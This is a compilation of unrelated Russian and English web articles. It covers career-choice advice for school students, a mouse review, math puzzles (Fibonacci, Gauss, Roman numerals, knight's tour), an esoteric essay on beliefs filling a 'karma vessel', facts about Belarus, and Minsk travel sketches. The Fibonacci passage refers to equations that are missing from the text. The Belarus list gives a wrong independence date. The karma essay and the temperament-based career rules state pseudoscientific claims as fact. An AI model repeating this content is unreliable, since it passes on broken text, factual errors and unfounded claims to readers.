ПАМЯТКА ВЫБИРАЮЩЕМУ ПРОФЕССИЮ

,
Выбор профессии — сложный и ответственный шаг в твоей жизни. Не предоставляй выбор своей будущей профессии случаю. Пользуйся информацией профессионалов. Профессию надо выбирать обдуманно, с учетом своих способностей, внутренних убеждений (только равнодушные идут куда придется), реальных возможностей, взвесив все «за» и «против».
С ЭТОЙ ЦЕЛЬЮ:
Изучи глубже самого себя:

  • разберись в своих интересах (что тебе интересно на уровне хобби, а что может стать профессией), склонностях, особенностях своего характера и физических возможностях.

  • Подумай, какие у тебя сильные и слабые стороны, главные и второстепенные качества.

  • Ознакомься с профессиями, которые соответствуют твоим интересам и способностям. Прочти побольше книг, статей, журналов.

  • Наметь предварительно избираемую профессию или группу родственных профессий.

  • Побеседуй с представителями избираемых профессий, постарайся побывать на рабочем месте этих специалистов, ознакомься с характером и условиями труда. Продумай, как, где и когда можно попробовать свои силы в этом деле практически и — действуй!

  • Ознакомься с учебными заведениями, в которых можно получить избранную профессию.

  • Сопоставь свои личные качества и возможности с характером той профессии, которую ты выбрал.

  • Приняв решение, не отступай перед трудностями. Будь настойчив в достижении намеченных целей.



  • ЛИЧНЫЙ ПРОФЕССИОНАЛЬНЫЙ ПЛАН УЧАЩЕГОСЯ

    1. Главная цель (что я буду делать, каким буду, чего достигну, идеал жизни и деятельности).
    2. Цепочка ближайших и более отдаленных конкретных целей (чему и где учиться, перспективы повышения мастерства).
    3. Пути и средства достижения ближайших целей (беседы с людьми, проба сил, самообразование, поступление в учебное заведение, подготовительные курсы).
    4. Внешние условия достижения целей (трудности, возможные препятствия, возможное противодействие тех или иных людей).
    5. Внутренние условия (свои возможности: состояние здоровья, способности к теоретическому или практическому обучению, настойчивость, терпение, личные качества, необходимые для работы по данной специальности).
    6. Запасные варианты целей и путей их достижения на случай возникновения непреодолимых препятствий для реализации основного варианта.


    ХАРАКТЕРИСТИКА ПРОФЕССИОНАЛЬНОГО ПЛАНА:


  • определенность, ясность плана (если человек указывает на единственную профессию и соответствующий тип учебного заведения);

  • полнота плана (когда учтены все необходимые факторы выбора профессии: направленность интересов, склонностей, способностей, состояние здоровья, уровень образования и т. д.);

  • устойчивость плана (во времени, как уверенность в правильности выбора и помехоустойчивость в стремлении к его осуществлению);

  • реалистичность плана (как опора на реальные социальные и психологические возможности реализации выбора);

  • логическая обоснованность и внутренняя согласованность (как соотнесение склонностей и способностей человека с требованиями профессии);

  • моральная оправданность плана (если мотивы профессии относятся к содержанию деятельности);

  • согласованность плана с потребностями рынка труда.



  • ЭТАПЫ ФОРМИРОВАНИЯ ПРОФЕССИОНАЛЬНОГО ПЛАНА

    Составляя личный профессиональный план, необходимо:

  • определить, какой вид деятельности вам интересен; проанализировать в какой степени выражены склонности к работе в сферах «человек-природа», «человек-техника», «человек-человек», «человек-знаковая система», «человек-художественный образ»; составить формулу интересующей профессии;

  • выяснить, работники каких профессий требуются на рынке труда, в городе, районе, где вы живете;

  • сопоставить полученные данные и сделать вывод, в какой области профессиональной деятельности вы могли бы работать;

  • ознакомиться с интересующими профессиями, беседуя с их представителями, пользуясь профессиограммами, специальной литературой; посоветоваться с родителями; проконсультироваться с врачом;

  • соотнести свои индивидуальные особенности с требованиями избранной профессии;

  • узнать содержание интересующей профессии, условия работы, перспективы профессионального роста;

  • ознакомиться с возможными путями освоения профессии; побывать в учебных заведениях на «Днях открытых дверей»;

  • проанализировать преимущества и недостатки различных путей получения общеобразовательной и профессиональной подготовки.



  • ПРИНЦИПЫ, КОТОРЫМИ ДОЛЖЕН РУКОВОДСТВОВАТЬСЯ ЧЕЛОВЕК, ВЫБИРАЮЩИЙ ПРОФЕССИЮ

    ПРИНЦИП СОЗНАТЕЛЬНОСТИ. Правильно выбрать профессию может человек, четко осознавший:

  • что он хочет (осознающий свои цели, жизненные планы, идеалы, стремления, ценностные ориентации);

  • что он есть (знающий свои личностные и физические особенности);

  • что он может (знающий свои склонности, способности, дарования);

  • что от него потребует работа и трудовой коллектив.

  • ПРИНЦИП СООТВЕТСТВИЯ. Выбираемая профессия должна отвечать (соответствовать) интересам, склонностям, способностям, состоянию здоровья человека и одновременно потребностям общества в кадрах.
    ПРИНЦИП АКТИВНОСТИ. Профессию надо активно искать самому. В этом большую роль призваны сыграть: практическая проба сил в кружках, секциях, на факультативах; чтение литературы, экскурсии, встречи со специалистами, посещение учебных заведений в «Дни открытых дверей», самостоятельное обращение к психологу или профконсультанту.
    ПРИНЦИП РАЗВИТИЯ. Отражает идею необходимости развивать в себе такие качества, которые нужны для любой профессии. Это — психические процессы (мышление, память, внимание) и следующие черты характера: трудолюбие, добросовестность, прилежность, организованность, исполнительность, самостоятельность, инициативность, умение переносить неудачи, выдержка, настойчивость.


    ОШИБКИ И ЗАТРУДНЕНИЯ ПРИ ВЫБОРЕ ПРОФЕССИИ

    1. НЕЗНАНИЕ ПРАВИЛ ВЫБОРА ПРОФЕССИИ:

  • выбор профессии за компанию;

  • перенос отношения к человеку на саму профессию;

  • отождествление учебного предмета с профессией;

  • ориентация сразу на профессии высокой квалификации;

  • неумение определить путь получения профессии.

  • 2. НЕЗНАНИЕ САМОГО СЕБЯ:

  • незнание или недооценка своих физических особенностей;

  • незнание или недооценка своих психологических особенностей;

  • неумение соотнести свои способности с требованиями профессии;

  • 3. НЕЗНАНИЕ МИРА ПРОФЕССИЙ:

  • увлечение только внешней стороной профессии;

  • предубеждение в отношении престижности профессии;

  • незнание требований профессии к человеку;

  • устаревшие представления о характере и условиях труда конкретной профессии.



  • ПРОФЕССИОНАЛЬНАЯ ПРИГОДНОСТЬ

    Различают следующие степени профессиональной пригодности:
    1. Непригодность. Она может быть временной или практически непреодолимой. О ней говорят в тех случаях, когда имеются отклонения в состоянии здоровья, несовместимые с работой. При этом дело обстоит не обязательно так, что человек не может работать, а так, что работа в данной профессии может ухудшить состояние человека. Противопоказания бывают не только медицинские, но и психологические: те или иные стойкие личные качества будут помехой для овладения определенной профессией.
    2. Годность. Характеризуется тем, что нет противопоказаний, но нет и очевидных показаний. Иначе говоря, ни за, ни против. «Можешь выбирать эту профессию. Не исключено, что станешь хорошим работником». Примерно такими словами можно охарактеризовать данную степень профессиональной пригодности.
    3. Соответствие. Нет противопоказаний и есть некоторые личные качества, соответствующие требованиям профессии. Например, есть выраженный интерес к определенным объектам труда (технике, природе, людям, искусству) или успешный опыт в данной области. При этом не исключено соответствие другим профессиям. «Можешь выбрать эту профессию. И весьма вероятно, что ты будешь хорошим работником».
    4. Призвание. Это высший уровень профессиональной пригодности. Он характеризуется тем, что во всех элементах ее структуры есть явные признаки соответствия человека требованиям избираемого вида труда. Речь идет о признаках, которыми человек выделяется среди своих сверстников, находящихся в равных условиях обучения и развития. «В этой и именно в этой области труда ты будешь наиболее нужен людям».
    Чтобы открыть в себе призвание, важно смело «примеривать» себя к самым разным профессиям, необходимо практически пробовать свои силы в разных видах труда.


    ЧТО НУЖНО ЗНАТЬ ПРИ ВЫБОРЕ УЧЕБНОГО ЗАВЕДЕНИЯ

    Возможно, выбранную вами профессию можно получить в нескольких учебных заведениях. В таком случае возникает проблема выбора учебного заведения. Правильный выбор можно сделать, узнав все об этих учебных заведениях.
    Собирая информацию об учебном заведении, следует получить ответы на следующие вопросы:

  • Какой уровень образования позволяет получить учебное заведение (профессионально-техническое, среднее специальное, высшее)?

  • По каким специальностям и специализациям осуществляется профессиональная подготовка?

  • Какая квалификация присваивается по окончании учебного заведения?

  • Каковы предоставляемые формы обучения (дневная, вечерняя, заочная)? Платное или бесплатное обучение? Размер оплаты?

  • Какие требования предъявляются к поступающим (возраст, состояние здоровья, пол, уровень образования)?

  • Каков порядок приема в учебное заведение (сроки подачи документов, сроки сдачи экзаменов, льготы поступающим)?

  • Какова продолжительность обучения?

  • Оказывает ли учебное заведение помощь в трудоустройстве выпускников?

  • Есть ли подготовительные курсы. Когда они начинают работать и какая оплата?

  • Когда проводятся «Дни открытых дверей» в учебном заведении?

  • Адрес учебного заведения и его полное название?



  • УСЛОВИЕ ОПТИМАЛЬНОГО ВЫБОРА ПРОФЕССИИ

    хочу, могу, надо
    - зона оптимального выбора
    ХОЧУ — стремления личности (желания, интересы, склонности, идеалы).
    МОГУ — возможности личности (состояние здоровья, способности, уровень знаний, характер, темперамент).
    НАДО — потребности общества в кадрах, и осознания необходимости затратить определенные усилия для достижения жизненно важных целей.
    Планируя свою профессиональную карьеру, полезно ответить на следующие вопросы

  • От каких своих умений и способностей вы получаете наибольшее удовлетворение?

  • Каковы ваши основные интересы и любимое времяпрепровождение?

  • Какие учебные предметы у вас любимые?

  • Чем бы вы хотели заниматься каждый день по 8 часов из года в год?

  • О какой работе вы мечтаете?

  • Каким вы представляете свое занятие через 10 лет?

  • Какая работа была бы для вас идеальной? Опишите ее как можно подробнее. Представьте себя на этой работе, с кем вы работаете, как проводите время?

  • Каковы ваши критерии выбора профессии? (обязательные и желательные)

  • Какие ваши сильные стороны и навыки более всего позволяют вам считать себя подходящим для работы, которая вам кажется идеальной?

  • Какие пробелы в своих знаниях и умениях вам необходимо ликвидировать, чтобы получить идеальную для вас работу?

  • Если работа, идеальная для вас недостижима в настоящее время, то какую работу вы могли бы выполнять, чтобы продвигаться в избранном направлении?

  • С кем можно посоветоваться, чтобы получить полезную для планирования карьеры информацию?

  • И, наконец, запишите ваши ближайшие и долгосрочные цели в области карьеры и действуйте.



  • ТЕМПЕРАМЕНТ И СТИЛЬ ДЕЯТЕЛЬНОСТИ

    Каждый учащийся должен сделать выбор, где он будет продолжать обучение после школы. И для того, чтобы не ошибиться, необходимо учитывать свои индивидуальные особенности. Такие индивидуальные особенности как интересы, склонности весьма непостоянны и изменчивы. Поэтому нужно стимулировать их развитие. Однако есть и другой тип индивидуальных особенностей, которые изменить практически нельзя, но невозможно и не обращать на них внимания, т.к. они влияют на деятельность, на поведение, на взаимоотношения с окружающими. К таким особенностям и относится темперамент.
    Темпераментом называют совокупность свойств, характеризующих динамические особенности протекания психических процессов и поведения человека, их силу, скорость, возникновение, прекращение и изменение.
    Сегодня существует несколько разных типологий темперамента, но чаще всего наблюдаются те четыре типа, которые известны нам из классического учения о темпераментах: сангвинический, холерический, флегматический и меланхолический.
    В большинстве случаев в людях сочетаются черты всех четырех типов темперамента, один из которых выражен сильнее, а другие слабее. Можно говорить не о темпераменте, а о «темпераментной структуре», которая включает в себя все типы.
    Темперамент непосредственно сказывается на стиле работы, хотя степень его влияния на труд зависит от производственных условий и подготовленности рабочего или учащегося к данному виду труда и его направленности.
    Стиль работы — это совокупность манер поведения работника в труде, выражающаяся в целеустремленности, интересе, продолжительности врабатываемости, в темпе и производительности труда, в ритмичности трудового процесса, в требовательности к качеству результатов труда.

    Сангвиник может быть надежным в любой работе, кроме автоматической, однообразной и медлительной. Он более способен к живой, подвижной деятельности, требующей смекалки, находчивости и активности. Сангвиник обычно целеустремлен, работает не ради самой работы по необходимости, а с определенной целью достичь желаемого, причем настойчиво и терпеливо добивается намеченного результата. Но эта целеустремленность и настойчивость проявляются им, когда работа разнообразна и удовлетворяет его склонность к смене впечатлений. Во всех делах в меру сдержан и спокоен. Однако не терпит помех в работе с чьей-либо стороны. В случае таких задержек в работе часто «опускает руки», проявляет уже безразличие к делу и даже апатию.

    Холерик наиболее успешно выполняет работы с ярко выраженной цикличностью, где в какие-то периоды рабочего цикла требуется максимальное напряжение сил, а потом деятельность сменяется более спокойной работой другого характера до следующего цикла. Но он может со временем приспособиться и к равномерному ритму работы, которую хорошо освоит, и будет иметь в ней неизменный успех.
    Следует иметь в виду, что холерический темперамент более других способствует напряженности при выполнении опасных и ответственных действий, в которых допускаются те или иные неточности. Поэтому очень важно побуждать и укреплять его уверенность в успехе. Ему свойственно плохое самообладание. В случаях неудач — а они в период обучения у него бывают часто — он может принять опрометчивые решения.
    Холерикам предписывается деятельность, позволяющая установить нормальный порядок в труде и отдыхе, работу умеренно-деятельную, поскольку утомляющие физические и умственные занятия неблагоприятны для представителей данного типа темперамента. Вместе с тем они не должны выбирать профессию, требующую сидячего образа жизни, а также занятий, связанных с длительным пребыванием у огня (горны, печи) и, вообще, с высокими температурами, так как это тоже вредно для их здоровья.

    Флегматику наиболее соответствует такая учебная и производственная работа, где нет необходимости в быстром выполнении сноровистых и разнообразных действий. Флегматик приступает к работе не спеша, но готовится к ней обстоятельно, ничего не упуская из поля своего внимания. Врабатывается в нормальный ритм сравнительно долго. Темп работы не высок. Однако благодаря обстоятельной подготовке к работе, упорству и настойчивости производительность его труда может быть вполне удовлетворительной. Он требователен к качеству своей работы, но не стремится сделать больше и лучше, чем от него требуется. Не склонен к смене видов деятельности и их целей. Более расположен к однообразной, хорошо им освоенной работе.
    Флегматика приходится поторапливать. И при этом, учитывая его упорство и настойчивость в работе, а также то, что он и без понукания работает с большим, хотя и не ярко выраженным, напряжением, его нельзя упрекать в медлительности, потому что это его свойство не зависит от его воли. Его нужно поторапливать, помогая и подбадривая, но не лишая самостоятельности в действиях и излишне не опекая.

    Меланхолик в отношении эмоциональной возбудимости и впечатлительности — полная противоположность флегматику. Некоторое сходство их можно заметить лишь в вялом реагировании на раздражители, поступающие из окружающей среды, и в медлительности действий, хотя причины вялости и медлительности у них различны. Он может вполне успешно работать в спокойной и безопасной обстановке, не требующей от него быстрых реакций и частой смены характера деятельности. Однако длительное время, переживая обиды и даже незначительные «уколы» самолюбия, часто отвлекается в своих мыслях от выполняемой работы, допуская невнимательность и ошибки, поэтому врабатывается в нормальный ритм труда медленно и сохраняет его недолго в результате периодических появлений апатии и вялости. Темп работы непостоянен. Плодотворность труда может быть весьма высокой при бодром настроении и низкой — при подавленном.
    Предпочитает работать в одиночку. Благодаря своей высокой чувствительности, он легко улавливает и понимает тонкости в поведении людей, окружающем его мире, а так же в искусстве, литературе, музыке. Меланхолику подходит работа, требующая внимания, умения вникнуть и проработать мельчайшие детали. Ему противопоказана деятельность, требующая значительного напряжения, связанная с неожиданностями и осложнениями.

    Следует отметить, что любая группа людей работает эффективней, если в ней есть представители всех темпераментов. Меланхолики первыми чувствуют, в каком направлении надо начинать поиск. Холерики выполняют функции бесстрашных разведчиков. Сангвиники являются источником положительных эмоций и постоянно генерируют неожиданные идеи. Флегматики анализируют информацию и предлагают взвешенное решение.
    Таким образом, влияние свойств нервной системы (силы, подвижности, уравновешенности) и связанных с ними типологических особенностей личности на мотивацию деятельности проявляется в том, что у людей с определенным темпераментом обнаруживается предпочтение определенному типу профессиональной деятельности.

    Мыши:оптические,беспроводные и всякие разные,основательный обзор рынка

    ,
    Мыша это предмет,который держит в руке довольно продолжительное время каждый пользователь,поэтому выбор и покупка хорошей мышки играет большую роль в процесе работы за компом.В этой статье я описал те мышки,с которыми сам непосредственно имею опыт работы,так что может быть я что-то упустил из виду,хотя это маловероятно.Основными характеристиками любого грызуна являются качество и надёжность(чтоб на следующий день не начали кнопки вылетать и не переломался надвое мышинный провод) эргономичность(т.е. удобный дизайн,как мыша сидит в руке),функциональность(наличие дополнительных кнопок и функций,хотя как показывает практика двух кнопок со скроллингом обычно хватает)
    Рассмотрим продукцию основных фирм представленых на компьютерном рынке:
    Genius-известная китайская конторка,чем они только не занимаются.Их мышки усреднённые по всем параметрам,не особое качество средняя эргономика и такая же цена.
    A4 tech-мышки недорогие(даже дешёвые), но у меня к ним особая симпатия.Пример из жизни в Internet club поставили самую дешёвую мышку этой фирмы за 3$,она продержалась 5 месяцев без единого нарекания и глюка(очень неплохой результат).У мышек неплохое качество,нормальная эргономика и приемлемые цены.
    BTC- уже приближается к брэндам.Вроде ничего особенного,но мышки хорошие,и долго живут.
    Samsung-несмотря на то что продукт довольно доступный-грызуны просто супер.Неплохой ассортимент,отличная эргономика,стильный дизайн,отличное качество-вообщем то что надо.
    Logitech-не знаю почему но эти мыши мои любимые.Крысы удобные надёжные и недорогие.Идеально подобрын размер мыши,отлично сидит в руке.
    Microsoft-это дорогущие крысы,и очень хорошие соответственно.Тут дело не в том что это Microsoft,это просто дорогие мыши.Живут просто очень долго.
    Теперь о разновидностях грызунов.Мыши бывают обычные с шариком и оптические,с проводом и беспроводные.Обычные мыши с шариком вполне нормальные в использовании,единственный недостаток,время от времени их нужно чистить.Недавно я купил оптическую мышку KeyMouse за 15$.Сначала меня насторожило не очень громкое имя фирмы,и скромный дизайн.Как выяснилось в процессе эксплуатации-отличнейшая мышь,очень удобная,никаких глюков и проблем с чисткой.
    Насчёт беспроводных мышей-конечно это удобнее и круче,но соответственно дороже.В принципе провод мне никогда не мешал,от него есть даже польза-не даёт мышке упасть со стола.
    Надеюсь эта статья поможет кому то в выборе.Советую не экономить на мыши,а раз раскошелиться на хорошую Logitech или samsung и не знать проблем.

    Ряд Фибоначчи

    ,
    Фибоначчи составил такой ряд из натуральных чисел, который впоследствии оказался полезным в науке:
    1, 1, 2, 3, 5, 8, 13, 21, …
    Закон образования членов этого ряда очень прост: пер­вые два члена — единицы, а затем каждый последующий член получается путем сложения двух непосредственно ему предшествующих. Например, 2 = 1 + 1, 3 = 1 + 2, 5 = 2 + 3, 8 = 3 + 5 и т. д.
    Любая пара соседних чисел ряда Фибоначчи удовлетворяет одному из уравнений
    либо
    причем большее число является значением неизвестного x, а меньшее — значением неизвестного y. Например,
    или
    или
    и т.д. являются корнями первого уравнения, а
    и т.д. являются корнями второго уравнения.
    Ряд Фибоначчи известен не только математикам, но и природоведам.
    Если листья на ветке сидят одиноко, то они всегда располагаются кругом стебля, но не по окружности, а по винтовой линии, то-есть каждый последующий лист по­выше и в сторону от предыдущего. При этом для каждого вида растений характерен свой угол расхождения двух соседних листьев, который, как утверждают ботаники, выдерживается, более или менее точно во всех частях стебля. Этот угол обычно выражают дробью, показываю­щей, какую часть окружности он составляет. Так, у липы
    и вяза угол расхождения листьев составляет 1/2 окружности; у бука — 1/3, у дуба и вишни — 2/5, у тополя и груши — 3/8, у ивы— 5/13 и т. д. Тот же угол у данного вида растений сохраняется также и в расположении веток, почек, чешуек внутри почек, цветов.
    Наиболее распространены среди растений следующие углы расхождения (в частях окружности):
    Ряд числителей и ряд знаменателей здесь — числа Фибо­наччи, причем каждая из дробей (начиная с третьей) по­лучается из двух предыдущих путем сложения их числи­телей и знаменателей:
    и т.д.
    Источник: Математическая смекалка. Б.А. Кордемский. Москва, 1956.

    От 1 до 1 000 000 000

    ,
    Рассказывают, что когда 9-летнему Гауссу (крупнейший немецкий математик) учитель предложил найти сумму всех целых чисел от 1 до 100,
    1 + 2 + 3 + … + 98 + 99 + 100,
    то маленький Гаусс сам сообразил, каким способом можно очень быстро выполнить это сложение.
    Надо складывать первое число с последним, второе с предпоследним и т. д. Сумма каждой такой пары чисел равна 101 и повторяется она 50 раз.
    Следовательно, сумма всех целых чисел от 1 до 100 будет равна 101 × 50 = 5050.
    Этот же прием используйте для решения более трудной задачи: найти сумму всех цифр у всех целых чисел от 1 до 1 000 000 000.
    Обратите внимание: здесь речь идет не о сумме чисел, а о сумме цифр всех чисел!
    Источник: Математическая смекалка. Б.А. Кордемский. Москва, 1956.

    Римские цифры

    ,
    Древние римляне пользовались нумерацией, которая сохраняется до настоящего времени под именем римской нумерации. Мы пользуемся ею для обозначения юбилейных дат, для нумерации глав в книгах, строф в стихотворениях и т. д. В позднейшем своем виде римские цифры выглядят так:
    I = 1, V = 5, X = 10, L = 50, C = 100, D = 500, M = 1000.
    О происхождении римских цифр достоверных сведений нет. Цифра V могла первоначально служить изображением кисти руки, а цифра X могла составиться из двух пятерок. Точно так же знак для 1000 мог составиться из удвоения знака для 500 (или наоборот).
    В римской нумерации явственно сказываются следы пятеричной системы счисления. В языке же римлян (латинском) никаких следов пятеричной системы нет. Значит, эти цифры были заимствованы римлянами у другого народа (весьма вероятно — у этрусков).
    Все целые числа (до 5000) записываются с помощью повторения вышеприведенных цифр. При этом, если большая цифра стоит перед меньшей, то они складываются, если же меньшая стоит перед большей (в этом случае она не может повторяться), то меньшая вычитается из большей). Например, VI = 6, т. е. 5 + 1, IV = 4, т. е. 5 − 1, XL = 40, т. е. 50 − 10, LX = 60, т. е. 50 + 10. Подряд одна и та же цифра ставится не более трех раз: LXX = 70, LXXX = 80, число 90 записывается ХС (а не LXXXX).
    Первые 12 чисел записываются в римских цифрах так:
    I, II, III, IV, V, VI, VII, VIII, IX, X, XI, XII.
    Примеры:
    XXVIII = 28,
    XXXIX = 39,
    CCCXCVII = 397,
    MDCCCXVIII = 1818.
    Выполнение арифметических действий над многозначными числами в этой записи очень трудно. Тем не менее римская нумерация преобладала в Италии до XIII в., а в других странах Западной Европы — до XVI в.
    Источник: М. Я. Выгодский. Справочник по элементарной математике. Москва 1986.

    О ходе шахматного коня

    ,
    Старинная задача о ходе шахматного коня:
    Требуется обойти конем все 64 клетки шахматной доски так, чтобы на каждой клетке конь был только один раз и затем возвратился бы в клетку, из которой вышел.
    Задачей этой занимался Эйлер и в письме к Гольдбаху (26 апреля 1757 года) дал одно из решений ее. Вот что, между прочим, пишет он в этом интересном письме:
    «... Воспоминание о предложенной когда-то мне задаче послужило для меня недавно поводом к некоторым тонким изысканиям, в которых обыкновенный анализ, как кажется, не имеет никакого применения. Вопрос состоит в следующем. Требуется обойти шахматным конем все 64 клетки шахматной доски так, чтобы на каждой клетке он побывал только один раз. С этой целью все места, которые занимал конь при своих последовательных ходах, закрывались марками. Но к этому присоединилось еще требование, чтобы начало хода делалось с данного места. Это последнее условие казалось мне очень затрудняющим вопрос, так как я скоро нашел некоторые пути, при которых, однако, выбор начала для меня свободен. Я утверждаю, однако, что если полный обход коня будет возвратный, т. е. если конь из последнего места опять может перейти на первое, то устраняется и это затруднение. После некоторых изысканий по этому поводу я нашел, наконец, ясный способ находить сколько угодно подобных решений (число их, однако, не бесконечно), не делая проб. Подобное решение представлено на рисунке (рис. 1).
    Решение задачи о ходе шахматного коня, данное Эйлером
    Рис. 1. Решение задачи о ходе шахматного коня, данное Эйлером.
    Конь ходит в порядке, указанном числами. Так как из последнего места 64 он может перейти на 1, то этот полный ход есть возвратный».
    Таково решение задачи о ходе шахматного коня, данное Эйлером.
    В письме не указаны ни приемы, ни путь, которыми знаменитый ученый пришел к своему открытию.

    Ошибочные убеждения человечества

    ,
    Гордыню, тщеславие, завышенную самооценку. Подобное отношение к миру имеет место тогда, когда человек считает, что весь мир вращается вокруг него. И что бы в мире ни происходило, все направлено либо против, либо за него. Соответственно, человек считается только со своим мнением, потребностями и интересами, и презирает всех остальных. Либо человек очень властен и внутренне уверен , что для него достижимы любые цели. Эта идеализация приводит к полному разрушению всех планов и дел в целом сильного и уверенного в себе человека.


    Попытку поставить под свой контроль окружающий мир, властность. Подобное отношение к жизни характерно для людей, занимающих любые руководящие должности. По роду своей работы они планируют, как должны развиваться события и раздражаются, когда их планы рушатся. Такая же идеализация часто имеет место в семьях с властными женами. Для разрушения идеализации им даются слабые мужья, не умеющие зарабатывать деньги, пьющие или больные.

    Ревность. Это чувство возникает, когда один человек относится к другому, как к своей собственности. А моя собственность должна принадлежать только мне, и никто не смеет до нее дотрагиваться (или смотреть на нее). В порядке воспитания ревнивцу обычно достается свободолюбивая и внутренне независимая половина.

    Осуждение и презрение людей. Подобное отношение к людям возникает у тех, кто достиг реальных успехов в нашем мире - добился денег, славы или власти. Либо у человека имеются какие-то способности, позволяющие ему свысока поглядывать на остальных людей. Но не меньшим грехом является осуждение самого себя, например, своих слабых способностей, неумения достигать целей, прошлых поступков и т.д..

    Обида на жизнь. Такое отношение к жизни может сложиться у любого человека, независимо от уровня его способностей, благосостояния или успехов. Человек считает, что его жизнь не удалась. Или что он не получает того, что вроде бы должен. Или избыточно получает наказания ни за что. На самом деле его состояние является следствием его отношения к жизни.

    Недовольство собой или судьбой. Подобные убеждения обычно создаются в результате избыточной идеализации своих способностей. Расхождение реальности с собственными убеждениями вызывает раздражение, агрессивность, обиду или осуждение.

    Перечень ошибочных убеждений можно многократно расширить, включая политические, национальные, религиозные и иные взгляды. Примерами ошибочных убеждений являются внутренние настройки типа "жизнь не удалась", "я самый несчастный", "меня никто не любит", "я никогда не выйду замуж" и подобные. Людей с подобными убеждениями часто не интересуют ни деньги, ни слава, ни другие материальные или духовные ценности. Им просто нравится ощущать себя в подобном несчастном состоянии, часто они находят в этом определенное удовольствие. Точнее говоря, это состояние максимально комфортно для их неконтролируемой "словомешалки", которая таким образом оттягивает на себя все жизненные силы человека и вводит его в состояние депрессии или постоянных сомнений.

    Люди, обладающие ошибочными убеждениями, обычно находятся не в ладу с окружающим миром и являются любимыми клиентами эгрегора "несчастной жизни".

    Если рассматривать более глубоко, то ошибочные убеждения чаще всего являются результатом идеализации какой-то земной ценности. Но объекты идеализации иногда определить довольно трудно, а ошибочные убеждения обычно лежат на поверхности и декларируются самим человеком. Именно поэтому мы выделили их в отдельный источник жидкости, заполняющей "сосуд кармы".

    Каждая из перечисленных выше идеализаций и ошибочных убеждений имеет свой личный клапан на соответствующей трубе, и как только человек реализовал эту идеализацию, клапан тут же открывается, и жидкость через него начинает поступать в "сосуд кармы".

    Пока человек идеализирует хотя бы одну земную ценность, именно через нее жидкость поступает в соответствующую трубу, а через нее - в "сосуд кармы".

    Но как только человек осознает ошибочность своего отношения к земным ценностям, клапан тут же закрывается и жидкость перестает поступать по этому каналу в "сосуд кармы". Если все другие клапаны тоже перекрыты, то жидкость перестает поступать сверху и ее уровень в сосуде убывает ("карма очищается").

    Facts About Belarus

    ,
    Belarus is a country situated in the heart of Europe, right on the split of the Baltic Sea and Black Sea. It stands bordered by Poland in the west, Lithuania in the northwest, Latvia and Russia in the north, Russia in the northeast and east and Ukraine in the south. The country is spread over an area of approximately 207.6 thousand sq km, stretching 650 km from west to east and 560 km from north to south. In Europe, Belarus is only second to Great Britain and Rumania in the terms of size. If you want to explore the country further, make use of the information provided in the following lines.
     
    Fun & Interesting Facts about Belarus 
    • The official name of Belarus is the ‘Republic of Belarus.
    • The official languages of Belarus are Belarusian and Russian. Polish and Ukranian are also spoken there.
    • The Constitution of Belarus does not declare an official religion, although the primary religion in the country is Russian Orthodox.
    • The currency of Belarus is Belarusian Rouble.
    • The capital of Belarus is Minsk.
    • Belarus follows the system of Presidential Republic.
    • Belarus gained independence from the Soviet Union in July 1990.
    • The final unification of Belarusian lands, as defined by the modern borders, took place in 1939.
    • Since 1996, Belarus has been negotiating with Russia for unification into a single state, called the Union of Russia and Belarus.
    • More than 80 percent of the population of Belarus comprise of native Belarusians. Apart from that, there are sizable minorities of Russians, Ukrainians and Poles as well.
    • Belarus is, at times, also known as ’White Russia’.
    • The highest point in Belarus is formed by Mount Dzyarzhynskaya (346 m). While, the lowest point is formed by Nyoman River (90 m).
    • The largest lake in Belarus is Lake Naroch.
    • Belovezhskaya Pushcha National Park, the remainder of primeval European forest, is a World Heritage Site.
    • The oldest city of Belarus is Polotsk, which has been known since 862 AD.
    • The oldest monument in Belarus is St Sophia's Cathedral (Polotsk), built between 1044 and 1066.
    • The Belarusian Soviet Socialist Republic was one of the founders of the USSR.
    • The main industries of Belarus include metal-cutting machine tools, tractors, trucks and earthmovers.
    • Apart from Minsk, the other major cities of Belarus include Brest, Grodno, Gomel, Mogilev and Vitebsk.
    • Majority of Belarusians reside in the urban areas surrounding Minsk and other oblast (regional) capitals.

    A small review of sightseeing in Belarus

    ,


















    Trip in Belarus

    ,
    Minsk, Belarus


    События без хронологии.
    Внимание: не стоит придираться - это не туристический отчет, а совокупность личных (субъективных) впечатлений, которые, порой, имеют очень отдаленное отношение к самому городу.

    Зарисовка №1: разборки с завтраком.

    Утро. Отель "Планета".
    В рекламке, лежащей в номере, написано, что завтрак с 7 до 11 утра. Исходя из этого встаем мы, разумеется, в десять, и в половину одинадцатого оказываемся перед закрытыми дверями ресторана. Рядом с дверями написано: "Завтрак с 7 до 10:00".

    С.Б., обращаясь к квадратного вида "официанту": Похоже, мы опоздали.
    "Официант": Да, как ни странно, вы опоздали.
    Несса: Но я точно помню что в проспекте написано "до 11-ти"...
    "Официант": Вы опоздали, извините.

    В лифте видим вариацию на тему проспекта о завтраке, в котором написано "Завтрак в ресторане с 7 до 10:30 утра". Тихо удивляемся, в результате чего С.Б. решает спуститься на ресепшен.

    С.Б.: Девушка, а со скольки до скольки у вас завтрак?
    Девушка: С 7-ми до 10-ти.
    С.Б.: Странно. А в проспекте в номере написано совсем другое время...
    Девушка: Нет-нет, точно до десяти.
    С.Б.: Нет, смотрите (протягивает проспект, в котором белым по синему написано "с 7-ми до 11-ти").
    Девушка молчит и улыбается. Мы решаем экономить нервы и ехать завтракать в город.

    Зарисовка №2: еда и люди.

    Найти в выходные с утра нормальное место, в котором можно позавтракать, - не так-то просто. А если таковое и находится, то велик шанс, что завтракать придется в обществе вполне приличных с виду людей, которые начинают утро не только какими-то экзотическими салатиками, но и вполне обычной водкой.

    С.Б.: (официантке) Пожалуйста, тосты, гречневую кашу и кофе.
    Несса: А мне овсянку с черносливом и омлет. И тоже кофе.
    Официантка (видимо, не веря своим ушам - кто-то не заказал водку): Да, конечно. Только тостов нет, извините пожалуйста.
    С.Б.: Ладно. Тогда вот это (показывает в меню).
    Официантка: Хорошо. Кофе приносить сейчас, или позже?
    Несса: Сейчас.
    Официантка уходит.
    С.Б.: С каких пор ты кушаешь овсянку на завтрак?
    Несса: Последние несколько недель я живу с родителями - думаю, воспоминания о количестве блинов, жареной рыбы и прочих продуктов питания, данных нам "в дорогу", еще свежи в твоей памяти...
    С.Б.: По крайней мере, твой желудок скажет тебе "спасибо".
    Несса: Мой желудок привык кушать раз в день, так что вместо благодарности он просто удивляется.

    К слову, сервис в ресторанах, кафе и магазинах просто отличный. Как в Европе. В частности, С.Б. в одной кофейне вежливо сказал официантке, что сигара была недостаточно сухая, и девушка, извинившись, ее в счет не включила. У нас бы так...

